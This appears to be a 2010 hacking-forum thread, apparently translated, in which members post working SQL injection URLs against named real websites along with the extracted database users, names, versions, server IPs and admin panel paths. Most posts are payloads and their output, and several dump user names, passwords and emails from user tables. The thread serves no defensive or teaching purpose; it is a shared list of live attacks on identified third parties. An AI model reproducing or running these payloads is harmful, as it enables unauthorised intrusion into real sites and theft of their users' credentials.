SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. root_sashok

    root_sashok Elder

    Joined:
    4 Aug 2008
    Messages:
    402
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://profremont.com.ua/advices.php?article=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3--
    Username: profremon_base@192.168.2.4
    Database: profremon_base
    Version: 5.0.51a-log

    Code:
    http://www.vanillamusic.gr/index.php?module=content&action=article&id=-1+union+select+user(),2--
    Username: vmusic@localhost
    Database: vanillamusic_gr
    Version: 4.0.26

    Output is in the title.

    Code:
    http://www.savatouristik.ru/index.php?mid_open=7&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
    Username: client304@localhost
    Database: savatour
    Version: 4.0.27

    Code:
    http://www.downhill911.com/actualite-vtt-express.php?n=824+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9--
    Username: Root@localhost
    Database: lmorillon
    Version: 4.0.12-max-debug
     
    #11541 root_sashok, 22 Mar 2010
    Last edited: 23 Mar 2010
    1 person likes this.
  2. Dr..VATSON

    Dr..VATSON Elder

    Joined:
    7 Dec 2008
    Messages:
    56
    Likes Received:
    53
    Reputations:
    18
    PR: 5

    5.0.81-log

    dbo234342530@74.208.16.153


    Code:
    http://www.downtowncrossing.org/shop/shop.php?id=-103+union+select+1,group_concat%28username%29,3,group_concat%28password%29+from+admin%20--
    admin panel

    http://www.downtowncrossing.org/admin
     
  3. _eXorcist_

    _eXorcist_ Member

    Joined:
    24 Dec 2009
    Messages:
    100
    Likes Received:
    5
    Reputations:
    0
    Host Information

    Server = Apache
    Version = 5.0.70-debug-log
    Powered by = PHP/5.2.12-pl0-gentoo
    Attack Type = SQL Union Injection
    Current User = h_bolt_ru@localhost
    Current Database = bolt_ru
    Supports Union = yes
    Union Columns = 17

    Url| http://www.bolt.ru/cl2.php?metcod=1034

    Vuln: http://www.bolt.ru/cl2.php?metcod=1034+and+1=0+ Union Select 1 ,2,3,4,5,6,7,8, UNHEX(HEX([visible])) ,10,11,12,13,14,15,16,17

    Comment: --

    Visible Column: 9

    Hexed: True

    Cookie:

    Keyword:

    Param:

    Database:bolt_ru

    information_schema
    bolt_ru

    Tables:

    Columns: Table
     
    1 person likes this.
  4. kori256

    kori256 Member

    Joined:
    7 Feb 2009
    Messages:
    53
    Likes Received:
    33
    Reputations:
    6
    Code:
    http://www.globalideasbank.org/site/store/detail.php?articleId=43+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18,19+LIMIT+1,1--
    Username: gib_db@localhost
    Database: gib_db
    Version: 5.0.89-community
     
    2 people like this.
  5. root_sashok

    root_sashok Elder

    Joined:
    4 Aug 2008
    Messages:
    402
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://zdrave.bg/popup.php?c=n&id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4--
    Username: rossen_tiabg@localhost
    Database: rossen_zdrave
    Version: 5.0.86
     
  6. artel87

    artel87 New Member

    Joined:
    19 Jan 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    3
    Code:
    http://subaru-club.org/article.asp?ID=161+OR+161=(select%20db_name())&TopicArea=1&ParentID=1
    Database: subaru-club
    Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
     
    2 people like this.
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    Code:
    _http://www.jewstars.co.cc/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    Code:
    _http://nal-extrim.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    Code:
    _http://ottava.info/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    Code:
    _http://rap-dvor.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    Code:
    _http://6mobil.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    /admin.php
     
    #11547 Strilo4ka, 23 Mar 2010
    Last edited: 23 Mar 2010
    1 person likes this.
  8. KENTov

    KENTov New Member

    Joined:
    16 Dec 2009
    Messages:
    6
    Likes Received:
    4
    Reputations:
    1
    Code:
    http://www.michaelkenna.net/gallery.php?id=2
    Host IP: 69.89.18.101
    Web Server: Apache/2.2.15 (CentOS) mod_ssl/2.2.15 0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
    Powered-by: PHP/5.2.13
    DB Server: MySQL unknown ver
    Current DB: michafj0_mkenna

    :eek: ;) :p :)

    HTML:
    Target: 		http://www.fairfieldcountylook.com/gallery.php?id=161
    Host IP: 74.208.32.200
    Web Server: Apache
    Powered-by: PHP/4.4.9
    DB Server: MySQL >=5
    Current DB: db258333454
     
    #11548 KENTov, 23 Mar 2010
    Last edited: 23 Mar 2010
  9. root_sashok

    root_sashok Elder

    Joined:
    4 Aug 2008
    Messages:
    402
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.itest.ru/samoactual.php?qnum=-1+union+select+user(),version(),database()--
    Username: sociolove@localhost
    Database: sociolove
    Version: 5.0.26-log

    It doesn't output the tables; there's some kind of protection in place.

    KENTov, you can't post injections of the form "site.ru/index.php?id=1" in this thread; at least find the number of columns.

    SQL example:

    Code:
    http://www.michaelkenna.net/gallery.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10--
     
    #11549 root_sashok, 23 Mar 2010
    Last edited: 23 Mar 2010
    1 person likes this.
  10. KENTov

    KENTov New Member

    Joined:
    16 Dec 2009
    Messages:
    6
    Likes Received:
    4
    Reputations:
    1
    PHP:
    Target:         http://www.snis.ch/news.php?ID=15
    Host IP: 84.16.92.9
    Web Server: Apache
    DB Server: MySQL >=5
    Current DB: swissinternationalstudiesch
     
    1 person likes this.
  11. попугай

    попугай Elder

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196

    hn_sql@ouagadougou.dreamhost.com:hn_stream:5.0.89-userstats-log
     
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    PHP:
    _http://www.luxury-auction.org.ua/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    /admin.php
     
    #11552 Strilo4ka, 23 Mar 2010
    Last edited: 23 Mar 2010
  13. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    Code:
    http://www.diplom-service.ru/ds.php?id=-1+union+Select+version()--
    Code:
    http://www.haradagr-dp.co.jp/ds.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13--
    Code:
    http://www.bsp-abogados.com/noticias/index-de.php?id=-1+union+select+version()--
    Code:
    http://www.visionodontologia.com.br/dr.php?id=1&pagina=1%27+union+select+1,2,3,passwd,5,6,7,8,9+from+users/*
    Code:
    http://rolandos-cars-corfu.com/room-order-du.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11+users--

    Code:
    http://www.propuestasturismo.com.ar/dd.php?id=-4+union+select+1,2,3,4,5,6,7,version()--
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    http://www.arts-et-metiers.net/musee.php?P=214&id=278+and+1=0+union+select+1,2,3,4,concat(user,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user--

    user() : webuser@localhost

    version() : 5.0.44-log

    database() : cnam2007
     
  15. $n@ke

    $n@ke Elder

    Joined:
    18 Sep 2006
    Messages:
    736
    Likes Received:
    404
    Reputations:
    134
    cookie
    Microsoft Jet DB
     
    1 person likes this.
  16. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    Admin panel: /admin.php
     
  17. sqlinjector

    sqlinjector Member

    Joined:
    31 Dec 2009
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Shop + admin panel, nothing interesting

    admin panel: /admin

    HTML:
    http://www.offroadbikepartsonline.com.au/detail.php?prod_id=-32%27+union+select+1,2,3,4,5,6,7,8,9,group_concat(version(),0x3a,user(),0x3a,database()+separator+0x0),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+&cat_id=15
     
    1 person likes this.
  18. $n@ke

    $n@ke Elder

    Joined:
    18 Sep 2006
    Messages:
    736
    Likes Received:
    404
    Reputations:
    134
    Version: 5.0.45-log
    User: andy@localhost
    dbname: studentfund
     
    1 person likes this.
  19. root_sashok

    root_sashok Elder

    Joined:
    4 Aug 2008
    Messages:
    402
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.lyricsprovider.com/song.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7--
    Username: lyricsprovider@localhost
    Database: lyricsprovider
    Version: 5.0.45

    Tables:

     
    #11559 root_sashok, 23 Mar 2010
    Last edited: 23 Mar 2010
  20. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Code:
    http://content.tcc.fl.edu/contacts/show.asp?type=area&id=19+or+1=%28select+top+1+table_name+from+information_schema.tables%29+--+
    My first mssql :)
     